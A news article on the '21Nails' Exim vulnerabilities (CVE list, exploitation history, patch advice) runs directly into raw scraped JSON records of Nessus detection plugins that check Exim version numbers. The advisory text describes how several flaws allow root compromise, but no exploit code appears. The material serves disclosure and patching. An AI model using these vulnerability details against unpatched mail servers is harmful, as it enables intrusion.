The maintainers of Exim have [released patches](<https://www.openwall.com/lists/oss-security/2021/05/04/6>) to remediate as many as 21 security vulnerabilities in its software that could enable unauthenticated attackers to achieve complete remote code execution and gain root privileges.
Collectively named '[21Nails](<https://blog.qualys.com/vulnerabilities-research/2021/05/04/21nails-multiple-vulnerabilities-in-exim-mail-server>),' the flaws include 11 vulnerabilities that require local access to the server and 10 other weaknesses that could be exploited remotely. The issues were discovered by Qualys and reported to Exim on Oct. 20, 2020.
"Some of the vulnerabilities can be chained together to obtain a full remote unauthenticated code execution and gain root privileges on the Exim Server," Bharat Jogi, senior manager at Qualys, said in a public disclosure. "Most of the vulnerabilities discovered by the Qualys Research Team for e.g. CVE-2020-28017 affects all versions of Exim going back all the way to 2004."
Exim is a popular mail transfer agent (MTA) used on Unix-like operating systems, with over [60% of the publicly reachable mail servers](<https://www.securityspace.com/s_survey/data/man.202102/mxsurvey.html>) on the Internet running the software. A Shodan search reveals nearly four million Exim servers that are exposed online.
[Exim Mail Server Multiple Vulnerabilities (21Nails)](<https://vimeo.com/544783362>) from [Qualys, Inc.](<https://vimeo.com/qualys>) on [Vimeo](<https://vimeo.com>).
A quick summary of the [21 bugs](<https://www.exim.org/static/doc/security/CVE-2020-qualys/>) is listed below. If successfully exploited, they could be used to tweak email settings and even add new accounts on the compromised mail servers. Technical specifics about the flaws can be accessed [here](<https://www.qualys.com/2021/05/04/21nails/21nails.txt>).
Local vulnerabilities:
* CVE-2020-28007: Link attack in Exim's log directory
* CVE-2020-28008: Assorted attacks in Exim's spool directory
* CVE-2020-28014: Arbitrary file creation and clobbering
* CVE-2021-27216: Arbitrary file deletion
* CVE-2020-28011: Heap buffer overflow in queue_run()
* CVE-2020-28010: Heap out-of-bounds write in main()
* CVE-2020-28013: Heap buffer overflow in parse_fix_phrase()
* CVE-2020-28016: Heap out-of-bounds write in parse_fix_phrase()
* CVE-2020-28015: New-line injection into spool header file (local)
* CVE-2020-28012: Missing close-on-exec flag for privileged pipe
* CVE-2020-28009: Integer overflow in get_stdinput()
Remote vulnerabilities:
* CVE-2020-28017: Integer overflow in receive_add_recipient()
* CVE-2020-28020: Integer overflow in receive_msg()
* CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()
* CVE-2020-28021: New-line injection into spool header file (remote)
* CVE-2020-28022: Heap out-of-bounds read and write in extract_option()
* CVE-2020-28026: Line truncation and injection in spool_read_header()
* CVE-2020-28019: Failure to reset function pointer after BDAT error
* CVE-2020-28024: Heap buffer underflow in smtp_ungetc()
* CVE-2020-28018: Use-after-free in tls-openssl.c
* CVE-2020-28025: Heap out-of-bounds read in pdkim_finish_bodyhash()
In light of the recent [Microsoft Exchange server hacks](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>), it's imperative the patches are applied immediately, as email servers have emerged as a lucrative target for espionage campaigns. In the past, flaws in Exim software have been actively exploited by bad actors to mount a variety of attacks, including deploying a [Linux worm](<https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability>) to install cryptocurrency miners on affected servers.
Last May, the U.S. National Security Agency (NSA) warned that Russian military operatives, publicly known as Sandworm Team, were taking advantage of a remote code execution vulnerability tracked as [CVE-2019-10149](<https://thehackernews.com/2019/09/exim-email-security-vulnerability.html>) (aka [The Return of the WIZard](<https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt>)) to "add privileged users, disable network security settings, execute additional scripts for further network exploitation" at least since August 2019.
The NSA [called](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2196511/exim-mail-transfer-agent-actively-exploited-by-russian-gru-cyber-actors/>) it an "attacker's dream access."
"Mail Transfer Agents are interesting targets for attackers because they are usually accessible over the internet," Jogi said. "Once exploited, they could modify sensitive email settings on the mail servers, allow adversaries to create new accounts on the target mail servers."
Source: [The Hacker News](<https://thehackernews.com/2021/05/alert-new-21nails-exim-bugs-expose.html>), "ALERT — New 21Nails Exim Bugs Expose Millions of Email Servers to Hacking," published 2021-05-05.
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(149277);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/09/06\");\n\n script_cve_id(\"CVE-2020-28007\", \"CVE-2020-28008\", \"CVE-2020-28009\", \"CVE-2020-28010\", \"CVE-2020-28011\", \"CVE-2020-28012\", \"CVE-2020-28013\", \"CVE-2020-28014\", \"CVE-2020-28015\", \"CVE-2020-28016\", \"CVE-2020-28017\", \"CVE-2020-28018\", \"CVE-2020-28019\", \"CVE-2020-28020\", \"CVE-2020-28021\", \"CVE-2020-28022\", \"CVE-2020-28023\", \"CVE-2020-28024\", \"CVE-2020-28025\", \"CVE-2020-28026\", \"CVE-2021-27216\");\n script_xref(name:\"GLSA\", value:\"202105-01\");\n script_xref(name:\"IAVA\", value:\"2021-A-0216-S\");\n\n script_name(english:\"GLSA-202105-01 : Exim: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202105-01\n(Exim: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Exim. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker, by connecting to the SMTP listener daemon, could\n possibly execute arbitrary code with the privileges of the process or\n cause a Denial of Service condition. 
Furthermore, a local attacker could\n perform symlink attacks to overwrite arbitrary files with the privileges\n of the user running the application or escalate privileges.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202105-01\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Exim users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-mta/exim-4.94.2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-28026\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"mail-mta/exim\", unaffected:make_list(\"ge 4.94.2\"), vulnerable:make_list(\"lt 4.94.2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Exim\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-20T15:26:05", "description": "According to its banner, the version of Exim running on the remote host is prior to 4.94.2. 
It is, therefore, potentially affected by multiple vulnerabilities that can lead to remote code execution.", "cvss3": {}, "published": "2021-05-05T00:00:00", "type": "nessus", "title": "Exim < 4.94.2 Multiple Vulnerabilities (21Nails)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2021-27216"], "modified": "2022-09-05T00:00:00", "cpe": ["cpe:/a:exim:exim"], "id": "EXIM_4_94_2.NASL", "href": "https://www.tenable.com/plugins/nessus/149260", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149260);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/09/05\");\n\n script_cve_id(\n \"CVE-2020-28007\",\n \"CVE-2020-28008\",\n \"CVE-2020-28009\",\n \"CVE-2020-28010\",\n \"CVE-2020-28011\",\n \"CVE-2020-28012\",\n \"CVE-2020-28013\",\n \"CVE-2020-28014\",\n \"CVE-2020-28015\",\n \"CVE-2020-28016\",\n \"CVE-2020-28017\",\n \"CVE-2020-28018\",\n \"CVE-2020-28019\",\n \"CVE-2020-28020\",\n \"CVE-2020-28021\",\n \"CVE-2020-28022\",\n \"CVE-2020-28023\",\n \"CVE-2020-28024\",\n \"CVE-2020-28025\",\n \"CVE-2020-28026\",\n \"CVE-2021-27216\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0216-S\");\n\n script_name(english:\"Exim < 4.94.2 Multiple Vulnerabilities (21Nails)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote mail server is potentially affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Exim running on the 
remote host is prior to 4.94.2. It is, therefore,\npotentially affected by multiple vulnerabilities that can lead to remote code execution.\");\n # https://blog.qualys.com/vulnerabilities-research/2021/05/04/21nails-multiple-vulnerabilities-in-exim-mail-server\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5800058f\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.qualys.com/2021/05/04/21nails/21nails.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.exim.org/static/doc/security/CVE-2020-qualys/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Exim 4.94.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-28026\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:exim:exim\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SMTP problems\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smtpserver_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar port = get_service(svc:\"smtp\", default:25, exit_on_fail:TRUE);\n\nvar banner = get_smtp_banner(port:port);\nif (!banner) audit(AUDIT_NO_BANNER, port);\nif (\"Exim\" >!< banner) audit(AUDIT_NOT_LISTEN, 'Exim', port);\n\nvar matches = pregmatch(pattern:\"220.*Exim ([0-9\\._]+)\", string:banner);\nif (isnull(matches)) audit(AUDIT_SERVICE_VER_FAIL, 'Exim', port);\n\nvar version = matches[1];\n# Underscore was added to the version\nversion = ereg_replace(string:version, pattern:'_', replace:'.');\n\nif (ver_compare(ver:version, fix:'4.94.2', strict:FALSE) < 0)\n{\n report =\n '\\n Banner : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 4.94.2';\n\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, 'Exim', port, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-24T15:58:14", "description": "The Qualys Research Labs reported several vulnerabilities in Exim, a mail transport agent, which could result in local privilege escalation and remote code execution.\n\nDetails can be found in the Qualys advisory at https://www.qualys.com/2021/05/04/21nails/21nails.txt\n\nFor Debian 9 stretch, these problems have been fixed in version 4.89-2+deb9u8.\n\nWe recommend that you upgrade your exim4 packages.\n\nFor the detailed security status of exim4 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/exim4\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2021-05-07T00:00:00", "type": "nessus", "title": "Debian DLA-2650-1 : exim4 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28017", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026"], "modified": "2022-09-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:exim4", "p-cpe:/a:debian:debian_linux:exim4-base", "p-cpe:/a:debian:debian_linux:exim4-config", "p-cpe:/a:debian:debian_linux:exim4-daemon-heavy", "p-cpe:/a:debian:debian_linux:exim4-daemon-heavy-dbg", "p-cpe:/a:debian:debian_linux:exim4-daemon-light", "p-cpe:/a:debian:debian_linux:exim4-daemon-light-dbg", "p-cpe:/a:debian:debian_linux:exim4-dbg", "p-cpe:/a:debian:debian_linux:exim4-dev", "p-cpe:/a:debian:debian_linux:eximon4", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2650.NASL", "href": "https://www.tenable.com/plugins/nessus/149345", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2650-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(149345);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/09/06\");\n\n script_cve_id(\"CVE-2020-28007\", \"CVE-2020-28008\", \"CVE-2020-28009\", \"CVE-2020-28011\", \"CVE-2020-28012\", \"CVE-2020-28013\", \"CVE-2020-28014\", \"CVE-2020-28015\", \"CVE-2020-28017\", \"CVE-2020-28019\", \"CVE-2020-28020\", \"CVE-2020-28021\", \"CVE-2020-28022\", \"CVE-2020-28023\", \"CVE-2020-28024\", \"CVE-2020-28025\", \"CVE-2020-28026\");\n script_xref(name:\"IAVA\", value:\"2021-A-0216-S\");\n\n script_name(english:\"Debian DLA-2650-1 : exim4 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The Qualys Research Labs reported several vulnerabilities in Exim, a\nmail transport agent, which could result in local privilege escalation\nand remote code execution.\n\nDetails can be found in the Qualys advisory at\nhttps://www.qualys.com/2021/05/04/21nails/21nails.txt\n\nFor Debian 9 stretch, these problems have been fixed in version\n4.89-2+deb9u8.\n\nWe recommend that you upgrade your exim4 packages.\n\nFor the detailed security status of exim4 please refer to its security\ntracker page at: https://security-tracker.debian.org/tracker/exim4\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2021/05/msg00004.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.qualys.com/2021/05/04/21nails/21nails.txt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-28026\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-heavy-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-light-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:eximon4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"exim4\", reference:\"4.89-2+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-base\", reference:\"4.89-2+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-config\", reference:\"4.89-2+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.89-2+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", 
prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.89-2+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-light\", reference:\"4.89-2+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.89-2+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-dbg\", reference:\"4.89-2+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-dev\", reference:\"4.89-2+deb9u8\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"eximon4\", reference:\"4.89-2+deb9u8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-24T16:01:32", "description": "The version of exim installed on the remote host is prior to 4.92-1.33. It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS-2022-1622 advisory.\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the log directory (owned by a non-root user), a symlink or hard link attack allows overwriting critical root- owned files anywhere on the filesystem. (CVE-2020-28007)\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the spool directory (owned by a non-root user), an attacker can write to a /var/spool/exim4/input spool header file, in which a crafted recipient address can indirectly lead to command execution. (CVE-2020-28008)\n\n - Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow because get_stdinput allows unbounded reads that are accompanied by unbounded increases in a certain size variable. NOTE: exploitation may be impractical because of the execution time needed to overflow (multiple days). 
(CVE-2020-28009)\n\n - Exim 4 before 4.94.2 allows Out-of-bounds Write because the main function, while setuid root, copies the current working directory pathname into a buffer that is too small (on some common platforms).\n (CVE-2020-28010)\n\n - Exim 4 before 4.94.2 allows Heap-based Buffer Overflow in queue_run via two sender options: -R and -S.\n This may cause privilege escalation from exim to root. (CVE-2020-28011)\n\n - Exim 4 before 4.94.2 allows Exposure of File Descriptor to Unintended Control Sphere because rda_interpret uses a privileged pipe that lacks a close-on-exec flag. (CVE-2020-28012)\n\n - Exim 4 before 4.94.2 allows Heap-based Buffer Overflow because it mishandles -F '.(' on the command line, and thus may allow privilege escalation from any user to root. This occurs because of the interpretation of negative sizes in strncpy. (CVE-2020-28013)\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. The -oP option is available to the exim user, and allows a denial of service because root-owned files can be overwritten. (CVE-2020-28014)\n\n - Exim 4 before 4.94.2 has Improper Initialization that can lead to recursion-based stack consumption or other consequences. This occurs because use of certain getc functions is mishandled when a client uses BDAT instead of DATA. (CVE-2020-28019)\n\n - Exim 4 before 4.94.2 has Improper Restriction of Write Operations within the Bounds of a Memory Buffer.\n This occurs when processing name=value pairs within MAIL FROM and RCPT TO commands. (CVE-2020-28022)\n\n - Exim 4 before 4.94.2 allows Out-of-bounds Read. smtp_setup_msg may disclose sensitive information from process memory to an unauthenticated SMTP client. (CVE-2020-28023)\n\n - Exim 4 before 4.94.2 allows Buffer Underwrite that may result in unauthenticated remote attackers executing arbitrary commands, because smtp_ungetc was only intended to push back characters, but can actually push back non-character error codes such as EOF. 
(CVE-2020-28024)\n\n - Exim 4 before 4.94.2 allows Out-of-bounds Read because pdkim_finish_bodyhash does not validate the relationship between sig->bodyhash.len and b->bh.len; thus, a crafted DKIM-Signature header might lead to a leak of sensitive information from process memory. (CVE-2020-28025)\n\n - Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters, relevant in non-default configurations that enable Delivery Status Notification (DSN). Certain uses of ORCPT= can place a newline into a spool header file, and indirectly allow unauthenticated remote attackers to execute arbitrary commands as root. (CVE-2020-28026)\n\n - Exim 4 before 4.94.2 has Execution with Unnecessary Privileges. By leveraging a delete_pid_file race condition, a local user can delete arbitrary files as root. This involves the -oP and -oPX options.\n (CVE-2021-27216)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-08-05T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : exim (ALAS-2022-1622)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28019", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2021-27216"], "modified": "2022-08-30T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:exim", "p-cpe:/a:amazon:linux:exim-debuginfo", "p-cpe:/a:amazon:linux:exim-greylist", "p-cpe:/a:amazon:linux:exim-mon", "p-cpe:/a:amazon:linux:exim-mysql", "p-cpe:/a:amazon:linux:exim-pgsql", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2022-1622.NASL", "href": "https://www.tenable.com/plugins/nessus/163870", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory 
ALAS-2022-1622.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163870);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/30\");\n\n script_cve_id(\n \"CVE-2020-28007\",\n \"CVE-2020-28008\",\n \"CVE-2020-28009\",\n \"CVE-2020-28010\",\n \"CVE-2020-28011\",\n \"CVE-2020-28012\",\n \"CVE-2020-28013\",\n \"CVE-2020-28014\",\n \"CVE-2020-28019\",\n \"CVE-2020-28022\",\n \"CVE-2020-28023\",\n \"CVE-2020-28024\",\n \"CVE-2020-28025\",\n \"CVE-2020-28026\",\n \"CVE-2021-27216\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0216-S\");\n\n script_name(english:\"Amazon Linux AMI : exim (ALAS-2022-1622)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of exim installed on the remote host is prior to 4.92-1.33. It is, therefore, affected by multiple\nvulnerabilities as referenced in the ALAS-2022-1622 advisory.\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the\n log directory (owned by a non-root user), a symlink or hard link attack allows overwriting critical root-\n owned files anywhere on the filesystem. (CVE-2020-28007)\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the\n spool directory (owned by a non-root user), an attacker can write to a /var/spool/exim4/input spool header\n file, in which a crafted recipient address can indirectly lead to command execution. (CVE-2020-28008)\n\n - Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow because get_stdinput allows unbounded\n reads that are accompanied by unbounded increases in a certain size variable. NOTE: exploitation may be\n impractical because of the execution time needed to overflow (multiple days). 
(CVE-2020-28009)\n\n - Exim 4 before 4.94.2 allows Out-of-bounds Write because the main function, while setuid root, copies the\n current working directory pathname into a buffer that is too small (on some common platforms).\n (CVE-2020-28010)\n\n - Exim 4 before 4.94.2 allows Heap-based Buffer Overflow in queue_run via two sender options: -R and -S.\n This may cause privilege escalation from exim to root. (CVE-2020-28011)\n\n - Exim 4 before 4.94.2 allows Exposure of File Descriptor to Unintended Control Sphere because rda_interpret\n uses a privileged pipe that lacks a close-on-exec flag. (CVE-2020-28012)\n\n - Exim 4 before 4.94.2 allows Heap-based Buffer Overflow because it mishandles -F '.(' on the command\n line, and thus may allow privilege escalation from any user to root. This occurs because of the\n interpretation of negative sizes in strncpy. (CVE-2020-28013)\n\n - Exim 4 before 4.94.2 allows Execution with Unnecessary Privileges. The -oP option is available to the 